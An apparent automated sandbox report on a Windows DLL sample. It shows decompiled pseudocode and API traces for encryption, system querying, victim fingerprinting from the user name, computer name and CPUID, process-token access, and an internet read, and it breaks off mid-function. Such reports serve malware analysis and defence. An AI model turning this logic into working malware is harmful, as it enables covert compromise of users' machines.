                                      • Source File: 00000000.00000002.462725096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.462711009.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.462734832.000000000040B000.00000020.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.462762812.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.462942782.000000000040F000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.462949613.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.462959460.0000000000417000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.463317477.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                      Similarity
                                      • API ID: BinaryType
                                      • String ID: .$E$T
                                      • API String ID: 3726996659-2084332913
                                      • Opcode ID: c9510c780543748d5cb8e05b81fc0676f7d2c1223e9e3b7a3d5ea3e1e48fedcd
                                      • Instruction ID: fd522592ae312fe0becddd2110b2b0399cdea5240c20d448f2d9dcb69bd5e890
                                      • Opcode Fuzzy Hash: c9510c780543748d5cb8e05b81fc0676f7d2c1223e9e3b7a3d5ea3e1e48fedcd
                                      • Instruction Fuzzy Hash: 683112B09043188BDB149F64D9553D97BF0AB15308F1481EEC8596B3E1D7BA8ACACF86
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 109 44b5fbb-44b5ffb CryptAcquireContextW 110 44b6152-44b6158 GetLastError 109->110 111 44b6001-44b603d memcpy CryptImportKey 109->111 112 44b615b-44b6162 110->112 113 44b613d-44b6143 GetLastError 111->113 114 44b6043-44b6055 CryptSetKeyParam 111->114 115 44b6146-44b6150 CryptReleaseContext 113->115 116 44b605b-44b6064 114->116 117 44b6129-44b612f GetLastError 114->117 115->112 119 44b606c-44b6079 call 44b6d63 116->119 120 44b6066-44b6068 116->120 118 44b6132-44b613b CryptDestroyKey 117->118 118->115 124 44b607f-44b6088 119->124 125 44b6120-44b6127 119->125 120->119 122 44b606a 120->122 122->119 126 44b608b-44b6093 124->126 125->118 127 44b6098-44b60b5 memcpy 126->127 128 44b6095 126->128 129 44b60d0-44b60dc 127->129 130 44b60b7-44b60ce CryptEncrypt 127->130 128->127 131 44b60e5-44b60e7 129->131 130->131 132 44b60e9-44b60f3 131->132 133 44b60f7-44b6102 GetLastError 131->133 132->126 134 44b60f5 132->134 135 44b6116-44b611e call 44b6c2c 133->135 136 44b6104-44b6114 133->136 134->136 135->118 136->118
                                      C-Code - Quality: 50%
                                      			E044B5FBB(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                      				int _v8;
                                      				long* _v12;
                                      				int _v16;
                                      				void* _v20;
                                      				long* _v24;
                                      				void* _v39;
                                      				char _v40;
                                      				void _v56;
                                      				int _v60;
                                      				intOrPtr _v64;
                                      				void _v67;
                                      				char _v68;
                                      				void* _t61;
                                      				int _t68;
                                      				signed int _t76;
                                      				int _t79;
                                      				int _t81;
                                      				void* _t85;
                                      				long _t86;
                                      				int _t90;
                                      				signed int _t94;
                                      				int _t101;
                                      				void* _t102;
                                      				int _t103;
                                      				void* _t104;
                                      				void* _t105;
                                      				void* _t106;
                                      
                                      				_t103 = __eax;
                                      				_t94 = 6;
                                      				_v68 = 0;
                                      				memset( &_v67, 0, _t94 << 2);
                                      				_t105 = _t104 + 0xc;
                                      				asm("stosw");
                                      				asm("stosb");
                                      				_v40 = 0;
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosw");
                                      				asm("stosb");
                                      				_t61 =  *0x44ba0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
                                      				if(_t61 == 0) {
                                      					_a8 = GetLastError();
                                      				} else {
                                      					_t101 = 0x10;
                                      					memcpy( &_v56, _a8, _t101);
                                      					_t106 = _t105 + 0xc;
                                      					_v60 = _t101;
                                      					_v67 = 2;
                                      					_v64 = 0x660e;
                                      					_v68 = 8;
                                      					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
                                      					if(_t68 == 0) {
                                      						_a8 = GetLastError();
                                      					} else {
                                      						_push(0);
                                      						_push( &_v40);
                                      						_push(1);
                                      						_push(_v12);
                                      						if( *0x44ba0e4() == 0) {
                                      							_a8 = GetLastError();
                                      						} else {
                                      							_t18 = _t103 + 0xf; // 0x10
                                      							_t76 = _t18 & 0xfffffff0;
                                      							if(_a4 != 0 && _t76 == _t103) {
                                      								_t76 = _t76 + _t101;
                                      							}
                                      							_t102 = E044B6D63(_t76);
                                      							_v20 = _t102;
                                      							if(_t102 == 0) {
                                      								_a8 = 8;
                                      							} else {
                                      								_v16 = 0;
                                      								_a8 = 0;
                                      								while(1) {
                                      									_t79 = 0x10;
                                      									_v8 = _t79;
                                      									if(_t103 <= _t79) {
                                      										_v8 = _t103;
                                      									}
                                      									memcpy(_t102, _a12, _v8);
                                      									_t81 = _v8;
                                      									_a12 = _a12 + _t81;
                                      									_t103 = _t103 - _t81;
                                      									_t106 = _t106 + 0xc;
                                      									if(_a4 == 0) {
                                      										_t85 =  *0x44ba0a8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
                                      									} else {
                                      										_t85 =  *0x44ba0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
                                      									}
                                      									if(_t85 == 0) {
                                      										break;
                                      									}
                                      									_t90 = _v8;
                                      									_v16 = _v16 + _t90;
                                      									_t102 = _t102 + _t90;
                                      									if(_t103 != 0) {
                                      										continue;
                                      									} else {
                                      										L17:
                                      										 *_a16 = _v20;
                                      										 *_a20 = _v16;
                                      									}
                                      									goto L21;
                                      								}
                                      								_t86 = GetLastError();
                                      								_a8 = _t86;
                                      								if(_t86 != 0) {
                                      									E044B6C2C(_v20);
                                      								} else {
                                      									goto L17;
                                      								}
                                      							}
                                      						}
                                      						L21:
                                      						CryptDestroyKey(_v12);
                                      					}
                                      					CryptReleaseContext(_v24, 0);
                                      				}
                                      				return _a8;
                                      			}

                                      APIs
                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,044B24D8,00000001,044B58D7,00000000), ref: 044B5FF3
                                      • memcpy.NTDLL(044B24D8,044B58D7,00000010,?,?,?,044B24D8,00000001,044B58D7,00000000,?,044B1D97,00000000,044B58D7,?,7477C740), ref: 044B600C
                                      • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 044B6035
                                      • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 044B604D
                                      • memcpy.NTDLL(00000000,7477C740,04E695B0,00000010), ref: 044B609F
                                      • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,04E695B0,00000020,?,?,00000010), ref: 044B60C8
                                      • GetLastError.KERNEL32(?,?,00000010), ref: 044B60F7
                                      • GetLastError.KERNEL32 ref: 044B6129
                                      • CryptDestroyKey.ADVAPI32(00000000), ref: 044B6135
                                      • GetLastError.KERNEL32 ref: 044B613D
                                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 044B614A
                                      • GetLastError.KERNEL32(?,?,?,044B24D8,00000001,044B58D7,00000000,?,044B1D97,00000000,044B58D7,?,7477C740,044B58D7,00000000,04E695B0), ref: 044B6152
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDestroyEncryptImportParamRelease
                                      • String ID:
                                      • API String ID: 3401600162-0
                                      • Opcode ID: 59f88adef65fb5d5c1a8fe3d3eb39653252225539f922621b83668a215c465bb
                                      • Instruction ID: 2b6002f5de13f4ae612fb723f6409348febf249b5e29645e2b55cf173c9bf36c
                                      • Opcode Fuzzy Hash: 59f88adef65fb5d5c1a8fe3d3eb39653252225539f922621b83668a215c465bb
                                      • Instruction Fuzzy Hash: 74512DB1900208FFEF10DFA5D884AEE7BB9FB04341F01842AF945E6241D7759E14DBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 172 401308-401318 call 4010c4 175 401442-401443 172->175 176 40131e-401320 172->176 177 401321-401328 176->177 178 401329-401333 call 4010a8 177->178 181 401335-401350 NtQuerySystemInformation 178->181 182 40136a 178->182 183 401352 181->183 184 401355-401368 call 40152a 181->184 185 401371-401375 182->185 183->184 184->185 185->178 187 401377-401390 call 40197c Sleep 185->187 187->177 191 401392-401396 187->191 192 40139c-40139f 191->192 193 40143f-401441 191->193 194 4013f0-40140a call 402009 192->194 195 4013a1-4013ac call 4020a9 192->195 193->175 200 401430-401432 GetLastError 194->200 201 40140c-40141a WaitForSingleObject 194->201 202 4013ea 195->202 203 4013ae-4013c0 GetLongPathNameW 195->203 206 401435-40143b 200->206 204 401427-40142e CloseHandle 201->204 205 40141c-401421 GetExitCodeThread 201->205 202->194 207 4013e2-4013e8 203->207 208 4013c2-4013d3 call 4010a8 203->208 204->206 205->204 206->193 209 40143d GetLastError 206->209 207->194 208->207 212 4013d5-4013db GetLongPathNameW call 40152a 208->212 209->193 214 4013e0 212->214 214->194
                                      C-Code - Quality: 83%
                                      			E00401308(char _a4) {
                                      				long _v8;
                                      				long _v12;
                                      				char _v36;
                                      				void* __edi;
                                      				long _t25;
                                      				long _t27;
                                      				long _t28;
                                      				long _t32;
                                      				void* _t38;
                                      				intOrPtr _t40;
                                      				signed int _t44;
                                      				signed int _t45;
                                      				long _t50;
                                      				intOrPtr _t52;
                                      				signed int _t53;
                                      				void* _t57;
                                      				void* _t60;
                                      				signed int _t62;
                                      				signed int _t63;
                                      				void* _t67;
                                      				intOrPtr* _t68;
                                      
                                      				_t25 = E004010C4();
                                      				_v8 = _t25;
                                      				if(_t25 != 0) {
                                      					return _t25;
                                      				}
                                      				do {
                                      					_t62 = 0;
                                      					_v12 = 0;
                                      					_t50 = 0x30;
                                      					do {
                                      						_t57 = E004010A8(_t50);
                                      						if(_t57 == 0) {
                                      							_v8 = 8;
                                      						} else {
                                      							_t44 = NtQuerySystemInformation(8, _t57, _t50,  &_v12); // executed
                                      							_t53 = _t44;
                                      							_t45 = _t44 & 0x0000ffff;
                                      							_v8 = _t45;
                                      							if(_t45 == 4) {
                                      								_t50 = _t50 + 0x30;
                                      							}
                                      							_t63 = 0x13;
                                      							_t10 = _t53 + 1; // 0x1
                                      							_t62 =  *_t57 % _t63 + _t10;
                                      							E0040152A(_t57);
                                      						}
                                      					} while (_v8 != 0);
                                      					_t27 = E0040197C(_t57, _t62); // executed
                                      					_v8 = _t27;
                                      					Sleep(_t62 << 4); // executed
                                      					_t28 = _v8;
                                      				} while (_t28 == 9);
                                      				if(_t28 != 0) {
                                      					L25:
                                      					return _t28;
                                      				}
                                      				if(_a4 != 0) {
                                      					L18:
                                      					_push(0);
                                      					_t67 = E00402009(E00401BC9,  &_v36);
                                      					if(_t67 == 0) {
                                      						_v8 = GetLastError();
                                      					} else {
                                      						_t32 = WaitForSingleObject(_t67, 0xffffffff);
                                      						_v8 = _t32;
                                      						if(_t32 == 0) {
                                      							GetExitCodeThread(_t67,  &_v8);
                                      						}
                                      						CloseHandle(_t67);
                                      					}
                                      					_t28 = _v8;
                                      					if(_t28 == 0xffffffff) {
                                      						_t28 = GetLastError();
                                      					}
                                      					goto L25;
                                      				}
                                      				if(E004020A9(_t53,  &_a4) != 0) {
                                      					 *0x4041b8 = 0;
                                      					goto L18;
                                      				}
                                      				_t52 = _a4;
                                      				_t68 = __imp__GetLongPathNameW;
                                      				_t38 =  *_t68(_t52, 0, 0); // executed
                                      				_t60 = _t38;
                                      				if(_t60 == 0) {
                                      					L16:
                                      					 *0x4041b8 = _t52;
                                      					goto L18;
                                      				}
                                      				_t19 = _t60 + 2; // 0x2
                                      				_t40 = E004010A8(_t60 + _t19);
                                      				 *0x4041b8 = _t40;
                                      				if(_t40 == 0) {
                                      					goto L16;
                                      				}
                                      				 *_t68(_t52, _t40, _t60); // executed
                                      				E0040152A(_t52);
                                      				goto L18;
                                      			}

                                      APIs
                                        • Part of subcall function 004010C4: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00401313), ref: 004010D3
                                        • Part of subcall function 004010C4: GetVersion.KERNEL32 ref: 004010E2
                                        • Part of subcall function 004010C4: GetCurrentProcessId.KERNEL32 ref: 004010FE
                                        • Part of subcall function 004010C4: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401117
                                        • Part of subcall function 004010A8: HeapAlloc.KERNEL32(00000000,?,0040132F,00000030,76D863F0,00000000), ref: 004010B4
                                      • NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 0040133D
                                      • Sleep.KERNEL32(00000000,00000000,00000030,76D863F0,00000000), ref: 00401384
                                      • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 004013BA
                                      • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 004013D8
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,00401BC9,?,00000000), ref: 0040140F
                                      • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 00401421
                                      • CloseHandle.KERNEL32(00000000), ref: 00401428
                                      • GetLastError.KERNEL32(00401BC9,?,00000000), ref: 00401430
                                      • GetLastError.KERNEL32 ref: 0040143D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.950458300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000003.00000002.950449846.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950465136.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950497345.0000000000405000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950532385.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                                      Similarity
                                      • API ID: ErrorLastLongNamePathProcess$AllocCloseCodeCreateCurrentEventExitHandleHeapInformationObjectOpenQuerySingleSleepSystemThreadVersionWait
                                      • String ID:
                                      • API String ID: 3479304935-0
                                      • Opcode ID: 011c724f1e1ef679b4a9634cd0d9ed4f634c27a3dbcc4f0297eb3c5822c88b56
                                      • Instruction ID: f4196fe893bd33b1e9d5c3079516c57f955856417f1b88c1af068c445a7ec3dc
                                      • Opcode Fuzzy Hash: 011c724f1e1ef679b4a9634cd0d9ed4f634c27a3dbcc4f0297eb3c5822c88b56
                                      • Instruction Fuzzy Hash: 8831A671901215ABE720EFA58D849AF7AACEF45754F60413BF901F72E0D738DE4087A9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      control_flow_graph 215 401c83-401cda GetSystemTimeAsFileTime _aulldiv _snwprintf 216 401ce1-401cfa CreateFileMappingW 215->216 217 401cdc 215->217 218 401d44-401d4a GetLastError 216->218 219 401cfc-401d05 216->219 217->216 220 401d4c-401d52 218->220 221 401d15-401d23 MapViewOfFile 219->221 222 401d07-401d0e GetLastError 219->222 223 401d33-401d39 GetLastError 221->223 224 401d25-401d31 221->224 222->221 225 401d10-401d13 222->225 223->220 226 401d3b-401d42 CloseHandle 223->226 224->220 225->226 226->220
                                      C-Code - Quality: 69%
                                      			E00401C83(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                      				intOrPtr _v12;
                                      				struct _FILETIME* _v16;
                                      				short _v60;
                                      				struct _FILETIME* _t14;
                                      				intOrPtr _t15;
                                      				long _t18;
                                      				void* _t19;
                                      				void* _t22;
                                      				intOrPtr _t31;
                                      				long _t32;
                                      				void* _t34;
                                      
                                      				_t31 = __edx;
                                      				_t14 =  &_v16;
                                      				GetSystemTimeAsFileTime(_t14);
                                      				_push(0x192);
                                      				_push(0x54d38000);
                                      				_push(_v12);
                                      				_push(_v16);
                                      				L00402220();
                                      				_push(_t14);
                                      				_v16 = _t14;
                                      				_t15 =  *0x4041c4;
                                      				_push(_t15 + 0x40505e);
                                      				_push(_t15 + 0x405054);
                                      				_push(0x16);
                                      				_push( &_v60);
                                      				_v12 = _t31;
                                      				L0040221A();
                                      				_t18 = _a4;
                                      				if(_t18 == 0) {
                                      					_t18 = 0x1000;
                                      				}
                                      				_t19 = CreateFileMappingW(0xffffffff, 0x4041c8, 4, 0, _t18,  &_v60); // executed
                                      				_t34 = _t19;
                                      				if(_t34 == 0) {
                                      					_t32 = GetLastError();
                                      				} else {
                                      					if(_a4 != 0 || GetLastError() == 0xb7) {
                                      						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                                      						if(_t22 == 0) {
                                      							_t32 = GetLastError();
                                      							if(_t32 != 0) {
                                      								goto L9;
                                      							}
                                      						} else {
                                      							 *_a8 = _t34;
                                      							 *_a12 = _t22;
                                      							_t32 = 0;
                                      						}
                                      					} else {
                                      						_t32 = 2;
                                      						L9:
                                      						CloseHandle(_t34);
                                      					}
                                      				}
                                      				return _t32;
                                      			}

                                      APIs
                                      • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,00401C42,0000000A,?,?), ref: 00401C90
                                      • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00401CA6
                                      • _snwprintf.NTDLL ref: 00401CCB
                                      • CreateFileMappingW.KERNELBASE(000000FF,004041C8,00000004,00000000,?,?), ref: 00401CF0
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401C42,0000000A,?), ref: 00401D07
                                      • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 00401D1B
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401C42,0000000A,?), ref: 00401D33
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401C42,0000000A), ref: 00401D3C
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401C42,0000000A,?), ref: 00401D44
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.950458300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000003.00000002.950449846.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950465136.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950497345.0000000000405000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950532385.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                                      Similarity
                                      • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                      • String ID:
                                      • API String ID: 1724014008-0
                                      • Opcode ID: f52db384039304a089c71cd12dbd25e9578601f9327d946e205e13936b57b162
                                      • Instruction ID: 934acb93e0c2ecb47cadd57b2bdad6ee31a2ab6ba8ec4c39c125d8047e805e61
                                      • Opcode Fuzzy Hash: f52db384039304a089c71cd12dbd25e9578601f9327d946e205e13936b57b162
                                      • Instruction Fuzzy Hash: B721A4B2500104BFD710AFA4DD88EAE7BBCEB48355F10407AF605F71E0D67899418B68
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      control_flow_graph 236 44b3365-44b3379 237 44b337b-44b3380 236->237 238 44b3383-44b3395 call 44b2119 236->238 237->238 241 44b33e9-44b33f6 238->241 242 44b3397-44b33a7 GetUserNameW 238->242 244 44b33f8-44b340f GetComputerNameW 241->244 243 44b33a9-44b33b9 RtlAllocateHeap 242->243 242->244 243->244 247 44b33bb-44b33c8 GetUserNameW 243->247 245 44b344d-44b3471 244->245 246 44b3411-44b3422 RtlAllocateHeap 244->246 246->245 248 44b3424-44b342d GetComputerNameW 246->248 249 44b33ca-44b33d6 call 44b708d 247->249 250 44b33d8-44b33e7 HeapFree 247->250 251 44b342f-44b343b call 44b708d 248->251 252 44b343e-44b3447 HeapFree 248->252 249->250 250->244 251->252 252->245
                                      C-Code - Quality: 96%
                                      			E044B3365(char __eax, void* __esi) {
                                      				long _v8;
                                      				char _v12;
                                      				signed int _v16;
                                      				signed int _v20;
                                      				signed int _v28;
                                      				long _t34;
                                      				signed int _t39;
                                      				long _t50;
                                      				char _t59;
                                      				intOrPtr _t61;
                                      				void* _t62;
                                      				void* _t64;
                                      				char _t65;
                                      				intOrPtr* _t67;
                                      				void* _t68;
                                      				void* _t69;
                                      
                                      				_t69 = __esi;
                                      				_t65 = __eax;
                                      				_v8 = 0;
                                      				_v12 = __eax;
                                      				if(__eax == 0) {
                                      					_t59 =  *0x44ba310; // 0xd448b889
                                      					_v12 = _t59;
                                      				}
                                      				_t64 = _t69;
                                      				E044B2119( &_v12, _t64);
                                      				if(_t65 != 0) {
                                      					 *_t69 =  *_t69 ^  *0x44ba344 ^ 0x46d76429;
                                      				} else {
                                      					GetUserNameW(0,  &_v8); // executed
                                      					_t50 = _v8;
                                      					if(_t50 != 0) {
                                      						_t62 = RtlAllocateHeap( *0x44ba2d8, 0, _t50 + _t50);
                                      						if(_t62 != 0) {
                                      							if(GetUserNameW(_t62,  &_v8) != 0) {
                                      								_t64 = _t62;
                                      								 *_t69 =  *_t69 ^ E044B708D(_v8 + _v8, _t64);
                                      							}
                                      							HeapFree( *0x44ba2d8, 0, _t62);
                                      						}
                                      					}
                                      				}
                                      				_t61 = __imp__;
                                      				_v8 = _v8 & 0x00000000;
                                      				GetComputerNameW(0,  &_v8);
                                      				_t34 = _v8;
                                      				if(_t34 != 0) {
                                      					_t68 = RtlAllocateHeap( *0x44ba2d8, 0, _t34 + _t34);
                                      					if(_t68 != 0) {
                                      						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                      							_t64 = _t68;
                                      							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E044B708D(_v8 + _v8, _t64);
                                      						}
                                      						HeapFree( *0x44ba2d8, 0, _t68);
                                      					}
                                      				}
                                      				asm("cpuid");
                                      				_t67 =  &_v28;
                                      				 *_t67 = 1;
                                      				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                      				 *((intOrPtr*)(_t67 + 8)) = 0;
                                      				 *(_t67 + 0xc) = _t64;
                                      				_t39 = _v16 ^ _v20 ^ _v28;
                                      				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                      				return _t39;
                                      			}

                                      APIs
                                      • GetUserNameW.ADVAPI32(00000000,?), ref: 044B339C
                                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 044B33B3
                                      • GetUserNameW.ADVAPI32(00000000,?), ref: 044B33C0
                                      • HeapFree.KERNEL32(00000000,00000000), ref: 044B33E1
                                      • GetComputerNameW.KERNEL32(00000000,00000000), ref: 044B3408
                                      • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 044B341C
                                      • GetComputerNameW.KERNEL32(00000000,00000000), ref: 044B3429
                                      • HeapFree.KERNEL32(00000000,00000000), ref: 044B3447
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: HeapName$AllocateComputerFreeUser
                                      • String ID:
                                      • API String ID: 3239747167-0
                                      • Opcode ID: ec2630ddae57a67a53b9272df07228e7228c7ca1e397502e2bf7729855b1151a
                                      • Instruction ID: 44915c915179a59fb07d510d899b0bd62f092c9268a3566a455f731244935765
                                      • Opcode Fuzzy Hash: ec2630ddae57a67a53b9272df07228e7228c7ca1e397502e2bf7729855b1151a
                                      • Instruction Fuzzy Hash: 16313C71A00705EFEB10DFAADC81AAFB7F9FB48200F50446AE945E3211DB34ED019BA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 38%
                                      			E044B4321(char _a4, void* _a8) {
                                      				void* _v8;
                                      				void* _v12;
                                      				char _v16;
                                      				void* _v20;
                                      				char _v24;
                                      				char _v28;
                                      				char _v32;
                                      				char _v36;
                                      				char _v40;
                                      				void* _v44;
                                      				void** _t33;
                                      				void* _t40;
                                      				void* _t43;
                                      				void** _t44;
                                      				intOrPtr* _t47;
                                      				char _t48;
                                      
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				_v20 = _a4;
                                      				_t48 = 0;
                                      				_v16 = 0;
                                      				_a4 = 0;
                                      				_v44 = 0x18;
                                      				_v40 = 0;
                                      				_v32 = 0;
                                      				_v36 = 0;
                                      				_v28 = 0;
                                      				_v24 = 0;
                                      				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                      					_t33 =  &_v8;
                                      					__imp__(_v12, 8, _t33);
                                      					if(_t33 >= 0) {
                                      						_t47 = __imp__;
                                      						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                      						_t44 = E044B6D63(_a4);
                                      						if(_t44 != 0) {
                                      							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                      							if(_t40 >= 0) {
                                      								memcpy(_a8,  *_t44, 0x1c);
                                      								_t48 = 1;
                                      							}
                                      							E044B6C2C(_t44);
                                      						}
                                      						NtClose(_v8); // executed
                                      					}
                                      					NtClose(_v12);
                                      				}
                                      				return _t48;
                                      			}

                                      APIs
                                      • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 044B4368
                                      • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 044B437B
                                      • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 044B4397
                                        • Part of subcall function 044B6D63: RtlAllocateHeap.NTDLL(00000000,00000000,044B5D7B), ref: 044B6D6F
                                      • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 044B43B4
                                      • memcpy.NTDLL(?,00000000,0000001C), ref: 044B43C1
                                      • NtClose.NTDLL(?), ref: 044B43D3
                                      • NtClose.NTDLL(00000000), ref: 044B43DD
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                      • String ID:
                                      • API String ID: 2575439697-0
                                      • Opcode ID: dd511d909298e2296e7a6c57c686812baaf93b62f76d83a44891e700505dd2b8
                                      • Instruction ID: 32faa1f433bd80762f97f238e4d8d63173572ad01f9320b41faf0f36a20e9294
                                      • Opcode Fuzzy Hash: dd511d909298e2296e7a6c57c686812baaf93b62f76d83a44891e700505dd2b8
                                      • Instruction Fuzzy Hash: 1E21E9B1900619BBEF019F95CC85ADEBFBDEF08740F108016FA05E6111D7B19A559BE0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 70%
                                      			E044B1CA5(void* __eax, void* __ecx) {
                                      				long _v8;
                                      				void* _v12;
                                      				void* _v16;
                                      				void _v20;
                                      				void* __esi;
                                      				void* _t30;
                                      				void* _t38;
                                      				intOrPtr* _t39;
                                      				intOrPtr* _t41;
                                      				int _t45;
                                      				void* _t54;
                                      				long _t64;
                                      				void* _t67;
                                      				void* _t69;
                                      
                                      				_t58 = __ecx;
                                      				_t67 = __eax;
                                      				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                                      					L2:
                                      					_t30 = _t67;
                                      					_pop(_t68);
                                      					_t69 = _t30;
                                      					_t64 = 0;
                                      					ResetEvent( *(_t69 + 0x1c));
                                      					if(InternetReadFile( *(_t69 + 0x18),  &_v20, 4,  &_v8) != 0) {
                                      						L9:
                                      						if(_v8 == 0) {
